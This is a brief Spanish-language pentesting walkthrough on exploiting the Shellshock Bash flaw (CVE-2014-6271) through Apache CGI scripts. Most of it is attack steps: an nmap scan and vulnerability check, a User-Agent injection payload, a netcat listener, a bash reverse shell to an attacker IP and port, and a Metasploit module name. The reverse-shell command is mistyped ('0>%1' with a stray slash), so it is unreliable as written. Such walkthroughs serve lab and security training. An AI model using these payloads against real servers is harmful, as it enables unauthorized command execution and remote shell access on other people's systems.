Apache ShellShock
El CVE-2014-6271, conocido como "Shellshock", es una vulnerabilidad crítica encontrada en Bash. La falla permite a los atacantes ejecutar comandos arbitrarios al utilizar ciertas variables de entorno, comprometiendo potencialmente la seguridad del sistema afectado.
Esta explotación, se realiza sobre scripts CGI. En primer lugar, realizamos un escanéo y visualizamos que hay sobre el puerto 80 y Apache
Explotación Manual
nmap -sV <ip>Visualizando el código fuente de la web, podemos encontrar un cgi en ejecucion (/gettime.cgi)
Comprobar Vulnerabilidad
nmap -sV <IP> —script=http-shellshock —script-args “http-shellshock.uri=<ruta del script cgi>”Si vemos que es vulnerable podemos ejecutar comandos usando burpsuite
Una vez vemos que es vulnerable, iniciamos BurpSuite, activamos el proxy en FoxyProxy y hacemos una petición a la ruta donde se encuentra el script cgi
Podemos cambiar el user agent
() { :; }; echo; echo; /bin/bash -c '<comando>’
Podemos obtener una rev shell poniendonos en escucha con nc
nc -nlvpEjecutamos el siguiente comando en el user agent para obtener la rev shell
bash -i >& /dev/tcp/<IP_LOCAL>/<PUERTO_LOCAL>/ 0>%1
Exploitación Metasploit (Recomendado)
Usamos el módulo: exploit/multi/http/apache_mod_cgi_bash_env_exec
Última actualización